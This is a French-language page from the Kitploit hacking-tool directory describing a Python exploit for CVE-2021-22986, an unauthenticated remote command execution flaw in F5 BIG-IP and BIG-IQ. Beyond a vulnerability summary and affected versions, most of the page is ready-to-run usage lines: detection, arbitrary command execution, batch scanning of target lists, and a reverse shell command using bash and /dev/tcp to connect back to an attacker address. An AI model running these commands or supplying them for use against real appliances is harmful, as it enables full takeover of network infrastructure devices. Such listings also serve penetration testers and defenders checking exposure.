Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/amitlttwo/cve-2021-22986
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleOutil d'Accès à Distance
GitHubamitlttwo/cve-2021-22986

CVE-2021-22986

Exploit Python pour CVE-2021-22986, permettant une RCE non authentifiée sur F5 BIG-IP et BIG-IQ via iControl REST, avec exécution de commandes, scan par lots et fonctionnalités de shell inversé.

Voir le dépôt
il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-22986

Cette vulnérabilité permet à des attaquants non authentifiés ayant un accès réseau à l'interface iControl REST, via l'interface de gestion BIG-IP et les adresses IP self, d'exécuter des commandes système arbitraires, de créer ou supprimer des fichiers et de désactiver des services. Cette vulnérabilité ne peut être exploitée que via le plan de contrôle et non via le plan de données. L'exploitation peut conduire à un compromis total du système. Le système BIG-IP en mode Appliance est également vulnérable.

Produits vulnérables

F5 BIG-IQ 6.0.0-6.1.0 F5 BIG-IQ 7.0.0-7.0.0.1 F5 BIG-IQ 7.1.0-7.1.0.2 F5 BIG-IP 12.1.0-12.1.5.2 F5 BIG-IP 13.1.0-13.1.3.5 F5 BIG-IP 14.1.0-14.1.3.1 F5 BIG-IP 15.1.0-15.1.2 F5 BIG-IP 16.0.0-16.0.1

Utilisation

root@kitploit:~
python3 CVE_2021_22986.py

Détection de la vulnérabilité

root@kitploit:~
python3 CVE_2021_22986.py -v true -u https://192.168.174.164

Exécution de commandes

root@kitploit:~
python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c id

Exécution de la commande whoami

root@kitploit:~
python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c whoami

Analyse par lots

root@kitploit:~
python3 CVE_2021_22986.py -s true -f check.txt

Reverse Shell

root@kitploit:~
python3 CVE_2021_22986.py -r true -u https://192.168.174.164 -c "bash -i >&/dev/tcp/192.168.174.129/8888 0>&1"

Nouveau PoC

root@kitploit:~
python3 newpoc.py https://192.168.174.164

Références :-

  • https://support.f5.com/csp/article/K03009991

  • https://github.com/safesword/F5_RCE

  • https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986

  • https://github.com/Udyz/CVE-2021-22986-SSRF2RCE

Télécharger l’outil